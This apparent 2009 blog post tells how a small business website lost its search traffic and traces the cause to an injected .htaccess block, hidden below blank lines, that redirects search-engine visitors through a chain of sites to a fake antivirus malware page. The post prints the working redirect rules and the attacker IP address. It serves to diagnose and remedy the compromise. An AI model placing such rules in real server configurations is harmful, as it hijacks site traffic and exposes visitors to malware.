Gnarly Malware – Hijacks Website .htaccess and Steals Search Engine Traffic

Posted by on Jan 14, 2009 in Security, Web Development2 comments

A friend in the US called me a few days ago, asking me to take a look at his website, calypsoislandtours.com, since his site traffic had dropped dramatically, for no obvious reason. Upon further investigation, he discovered that only search engine traffic was affected, which, as with many if not most websites, happened to be a major proportion of his inbound traffic – not particularly good for his business.

I searched Google for his site, and sure enough, clicking on one of the results redirected my browser to a rather dodgy website that clearly wasn’t calypsoislandtours.com. So, I investigated further, and found that somehow, the .htaccess file on his server had been altered, to contain the following lines:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]

Which was also preceded by a couple of dozen lines of white space, so that to most users checking .htaccess, the code would be “hidden” below the viewable window of an average text editor (I used the Linux command more, via ssh to check the file).

Basically, this nasty little piece of code utilises mod_rewrite to tell Apache to look for any traffic coming to the server from Google, AOL, MSN, Altavista, Ask or Yahoo (all the big search engines), and then to redirect that traffic to a server with the IP 89.28.13.201 (in a second .htaccess file, the IP was 89.28.13.205).

Using a combination of traceroute and Lynx web browser, I tracked the redirects. The web server located at 89.28.13.201 installs a cookie (visited=1) and also contains a script to redirect to a string of sites  – first to worldgreenpeace.cn (link to Google Safe Browsing Info Page), which installs a cookie: soft=1. This site then redirects the browser to the final target destination of bestantivirusfastscan.com (link to Google Safe Browsing Info page) which installs a cookie: av_inst=880147 (arbitrary ID number – although it seems that 880147 people may have been redirected already). This final site contains Malware, which I presume does something nasty, although I felt no inclination to investigate further!

Thankfully, it was easy to cure – I simply deleted the above lines from .htaccess, and the website was instantly be back to normal, receiving the search engine traffic it should.

So, if you’re noticing a massive drop in search engine traffic to your site for no apparent reason, check the .htaccess first!

Tags: , ,